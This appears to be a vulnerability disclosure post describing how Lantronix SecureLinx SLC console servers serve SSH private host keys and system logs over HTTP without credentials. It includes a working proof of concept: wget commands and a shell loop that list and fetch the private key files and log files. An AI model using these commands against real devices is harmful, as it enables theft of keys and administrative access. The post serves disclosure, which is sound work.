Hi, I stumbled on another bug during my review for console servers: Summary: Lantronix SecureLinx console server: Retrieval of ssh-private keys and system logfiles Confirmed on SLC32, Software version: 2.0, 3.0 very likely on all models of SLC series (SLC8, 16, 32, 48) www.lantronix.com Details: Lantronix console servers come with a mini_httpd which doesn't care much in its configuration in the subdirectories of DocRoot about Unix acls. Lantronix SLC' have their /etc/ssh directory below DocumentRoot. One can easily retrieve ssh private keys through the network without providing credentials, thus rendering ssh-encryption close to useless. Also one can read logfiles through the network. Though the directory is named /cifsshare/logs/ it contains system logs, potentially also snifferlogs from serial console sessions. Note that console servers provide administrative console access to devices hooked up on their serial lines (up to 48) Vulnerable Versions: Vendor Confirmation for SLC-Series, Firmware 2.0 (researched), 3.0 (current) Patches/Workarounds: Bugfix pending. Vendor is working on 3.1, to be released in August. Supposedly fixed by then. "Exploit": %%%%%%%%%%%%%%%% myprompt:~ # ssh slc The authenticity of host 'slc (192.168.50.205)' can't be established. RSA key fingerprint is d5:d8:93:33:db:b3:80:91:74:79:be:e7:ff:f6:c6:41. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'slc,192.168.50.205' (RSA) to the list of known hosts. Welcome to the SLC login: root Password: Connection to slc closed. myprompt:~ # tail -1 .ssh/known_hosts slc,192.168.50.205 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA9FZwKSNlfAl72aWewoXE1e8g09 9yCSqVKGTRWSkOBKV8oqVgX8ryj/adwSLbwxSi8HyLd9AfiNmyyTJ4/ITX4JgpNCcw8k6SNK3HrletSs 7z4EGHiYcB25gIgX6fQrnjkm1AP3HXR0Wkeg7B5wFqwqKkNUd/aPhegLxjpufB0g0= myprompt:~ # wget -q -O - https://slc/etc Index of etc/

Index of etc/

-rw-------    1 root          672 Jan  1  1970 ssh_host_dsa_key
-rw-r--r--    1 root          601 Jan  1  1970 ssh_host_dsa_key.pub
-rw-------    1 root          526 Jan  1  1970 ssh_host_key
-rw-r--r--    1 root          330 Jan  1  1970 ssh_host_key.pub
-rw-------    1 root          883 Jan  1  1970 ssh_host_rsa_key
-rw-r--r--    1 root          221 Jan  1  1970 ssh_host_rsa_key.pub

mini_httpd/1.15c 02m ay2001
myprompt:~ # wget -q -O - https://slc/etc/ssh_host_rsa_key.pub ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA9FZwKSNlfAl72aWewoXE1e8g099yCSqVKGTRWSkOBKV8 oqVgX8ryj/adwSLbwxSi8HyLd9AfiNmyyTJ4/ITX4JgpNCcw8k6SNK3HrletSs7z4EGHiYcB25gIgX6f Qrnjkm1AP3HXR0Wkeg7B5wFqwqKkNUd/aPhegLxjpufB0g0= root@(none) myprompt:~ # wget -q -O - https://slc/etc/ssh_host_rsa_key | grep -w KEY -----BEGIN RSA PRIVATE KEY----- -----END RSA PRIVATE KEY----- myprompt:~ # wget -q -O - https://slc/etc/ssh_host_dsa_key | grep -w KEY -----BEGIN DSA PRIVATE KEY----- -----END DSA PRIVATE KEY----- myprompt:~ # wget -O - -q https://slc/cifsshare/logs/ Index of cifsshare/logs/

Index of cifsshare/logs/

lrwxrwxrwx  Oct  21  2004 authentication  -> ../../../var/log/secure
lrwxrwxrwx  Oct  21  2004 devports  -> ../../../var/log/devports
lrwxrwxrwx  Oct  21  2004 diag  -> ../../../var/log/diag
lrwxrwxrwx  Oct  21  2004 general  -> ../../../var/log/general
lrwxrwxrwx  Oct  21  2004 network  -> ../../../var/log/network
lrwxrwxrwx  Oct  21  2004 services  -> ../../../var/log/services
lrwxrwxrwx  Oct  21  2004 sw  -> ../../../var/log/sw

mini_httpd/1.15c 02may2001
myprompt:~ # for i in `lynx -dump -nolist https://slc/cifsshare/logs/ |awk '{ print $5 }'`; do echo ; echo ---$i---; wget -O - -q https://slc/cifsshare/logs/$i; done [.. too long to list it here, but you have enough phantasy ..] %%%%%%%%%%%%%%%% more to come. Cheers, Dirk -- Dr. Dirk Wetter http://drwetter.org Consulting IT-Security + Open Source Key fingerprint = 80A2 742B 8195 969C 5FA6 6584 8B6E 59C1 E41B 9153